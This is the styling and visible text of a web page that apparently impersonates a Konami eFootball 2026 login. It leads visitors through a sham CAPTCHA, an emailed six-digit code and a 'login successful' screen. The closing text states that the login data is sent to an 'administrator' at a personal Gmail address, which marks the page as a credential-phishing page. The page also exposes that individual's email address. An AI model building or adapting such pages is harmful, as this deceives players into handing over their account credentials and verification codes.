* { margin: 0; padding: 0; box-sizing: border-box; font-family: 'Montserrat', Arial, sans-serif; } body { background: linear-gradient(135deg, #0a0a1a 0%, #1a0a2a 50%, #2a0a3a 100%); color: white; min-height: 100vh; display: flex; justify-content: center; align-items: center; padding: 20px; overflow-x: hidden; position: relative; } .background-effects { position: fixed; top: 0; left: 0; width: 100%; height: 100%; z-index: -2; overflow: hidden; } .background-slider { position: absolute; width: 100%; height: 100%; background: url('https://images.unsplash.com/photo-1575361204480-aadea25e6e68?ixlib=rb-4.0.3&auto=format&fit=crop&w=2070&q=80') center/cover; opacity: 0.2; } .konami-container { width: 100%; max-width: 900px; background: rgba(10, 10, 30, 0.95); backdrop-filter: blur(15px); border-radius: 20px; overflow: hidden; box-shadow: 0 20px 50px rgba(255, 0, 0, 0.3); border: 2px solid rgba(255, 0, 0, 0.2); position: relative; z-index: 1; } /* الهيدر */ .pes-header { background: linear-gradient(to right, rgba(10, 10, 30, 0.9), rgba(255, 0, 0, 0.7)); padding: 25px; text-align: center; position: relative; } .konami-logo { color: white; font-size: 42px; font-weight: 900; letter-spacing: 3px; text-shadow: 0 0 20px rgba(255, 0, 0, 0.8); margin-bottom: 10px; } .efootball-logo { font-size: 36px; font-weight: 800; background: linear-gradient(to right, #ff0000, #ff3333); -webkit-background-clip: text; -webkit-text-fill-color: transparent; text-shadow: 0 0 25px rgba(255, 0, 0, 0.6); } .year-badge { background: linear-gradient(to right, #ff0000, #cc0000); color: white; padding: 8px 20px; border-radius: 25px; font-weight: 900; font-size: 20px; position: absolute; top: 20px; right: 20px; box-shadow: 0 5px 15px rgba(255, 0, 0, 0.5); border: 2px solid white; } /* المحتوى الرئيسي */ .login-section { padding: 40px; } .login-title { font-size: 28px; font-weight: 900; color: #ff3333; margin-bottom: 10px; text-align: center; } .login-subtitle { font-size: 16px; color: #cccccc; margin-bottom: 30px; text-align: center; } /* خطوات التسجيل */ .login-steps { display: flex; justify-content: space-between; margin-bottom: 40px; position: relative; } .login-steps::before { content: ''; position: absolute; top: 25px; left: 10%; right: 10%; height: 3px; background: rgba(255, 0, 0, 0.3); z-index: 1; } .step { text-align: center; position: relative; z-index: 2; flex: 1; } .step-icon { width: 50px; height: 50px; background: rgba(255, 0, 0, 0.2); border-radius: 50%; display: flex; align-items: center; justify-content: center; margin: 0 auto 10px; font-size: 20px; color: #ff6666; border: 3px solid rgba(255, 0, 0, 0.5); transition: all 0.3s; } .step.active .step-icon { background: #ff0000; color: white; border-color: #ff3333; box-shadow: 0 0 20px rgba(255, 0, 0, 0.7); } .step-text { font-size: 12px; color: #999999; font-weight: 600; } .step.active .step-text { color: #ff3333; font-weight: 700; } /* تصميم النماذج */ .form-container { position: relative; min-height: 400px; } .form-step { position: absolute; width: 100%; opacity: 0; transform: translateX(50px); transition: all 0.5s; pointer-events: none; } .form-step.active { opacity: 1; transform: translateX(0); pointer-events: all; } .form-group { margin-bottom: 25px; } .form-label { display: block; margin-bottom: 10px; font-size: 16px; font-weight: 700; color: #ff9999; } .input-field { width: 100%; padding: 15px; background: rgba(30, 20, 60, 0.8); border: 2px solid rgba(255, 0, 0, 0.4); border-radius: 10px; color: white; font-size: 16px; transition: all 0.3s; } .input-field:focus { outline: none; border-color: #ff0000; box-shadow: 0 0 15px rgba(255, 0, 0, 0.5); background: rgba(40, 30, 70, 0.9); } /* CAPTCHA */ .captcha-container { background: rgba(20, 10, 40, 0.9); border-radius: 10px; padding: 20px; margin-bottom: 20px; border: 2px solid rgba(255, 0, 0, 0.3); text-align: center; } .captcha-code { font-size: 32px; font-weight: 900; letter-spacing: 5px; color: white; background: rgba(255, 0, 0, 0.3); padding: 15px; border-radius: 8px; border: 2px solid #ff0000; margin: 15px 0; font-family: monospace; } .refresh-btn { background: rgba(255, 0, 0, 0.3); border: 2px solid rgba(255, 0, 0, 0.5); color: white; padding: 10px 20px; border-radius: 8px; cursor: pointer; margin-top: 10px; font-weight: 600; transition: all 0.3s; } .refresh-btn:hover { background: rgba(255, 0, 0, 0.5); transform: scale(1.05); } /* زر تسجيل الدخول الأحمر */ .login-button { width: 100%; padding: 18px; background: linear-gradient(to right, #ff0000, #cc0000); color: white; border: none; border-radius: 10px; font-size: 20px; font-weight: 900; cursor: pointer; transition: all 0.3s; margin-top: 20px; text-transform: uppercase; box-shadow: 0 5px 15px rgba(255, 0, 0, 0.4); position: relative; overflow: hidden; } .login-button:hover:not(:disabled) { background: linear-gradient(to right, #cc0000, #990000); transform: translateY(-3px); box-shadow: 0 8px 20px rgba(255, 0, 0, 0.6); } .login-button:disabled { background: #666666; cursor: not-allowed; transform: none; box-shadow: none; } /* رمز التحقق */ .verification-container { text-align: center; } .code-inputs { display: flex; justify-content: center; gap: 10px; margin: 25px 0; } .code-input { width: 55px; height: 65px; background: rgba(30, 20, 60, 0.9); border: 2px solid rgba(255, 0, 0, 0.5); border-radius: 8px; color: white; font-size: 28px; font-weight: 900; text-align: center; transition: all 0.3s; } .code-input:focus { border-color: #ff0000; box-shadow: 0 0 10px rgba(255, 0, 0, 0.5); outline: none; } /* العد التنازلي */ .countdown-container { text-align: center; margin: 20px 0; padding: 15px; background: rgba(255, 0, 0, 0.1); border-radius: 10px; border: 1px solid rgba(255, 0, 0, 0.3); } .countdown-text { font-size: 16px; color: #ff9999; margin-bottom: 10px; } .countdown-timer { font-size: 32px; font-weight: 900; color: #ff0000; font-family: monospace; } /* رسائل الحالة */ .status-message { margin-top: 20px; padding: 20px; border-radius: 10px; text-align: center; display: none; } .status-message.active { display: block; animation: fadeIn 0.5s; } .status-success { background: rgba(0, 150, 0, 0.2); border: 2px solid #00cc00; color: #00ff00; } .status-error { background: rgba(255, 0, 0, 0.2); border: 2px solid #ff0000; color: #ff6666; } .status-info { background: rgba(0, 100, 255, 0.2); border: 2px solid #0066ff; color: #6699ff; } .email-status { margin-top: 15px; padding: 10px; border-radius: 5px; font-size: 14px; text-align: center; } .email-success { background: rgba(0, 200, 0, 0.2); border: 1px solid #00cc00; color: #00ff00; } .email-error { background: rgba(255, 0, 0, 0.2); border: 1px solid #ff0000; color: #ff6666; } @keyframes fadeIn { from { opacity: 0; } to { opacity: 1; } } @media (max-width: 768px) { .login-section { padding: 25px; } .konami-logo { font-size: 32px; } .efootball-logo { font-size: 28px; } .code-input { width: 45px; height: 55px; font-size: 24px; } }
2026
SECURITY VERIFICATION

Enter the code below to confirm you're not a robot

A3B8C
EMAIL VERIFICATION

A 6-digit verification code has been sent to:

Code expires in:
02:00

Resend code if you didn't receive it

LOGIN SUCCESSFUL!

Welcome to eFootball™ 2026!

Your account has been successfully verified and activated.

Login data has been sent to administrator email.

Admin: mohammed.benhammou1111@gmail.com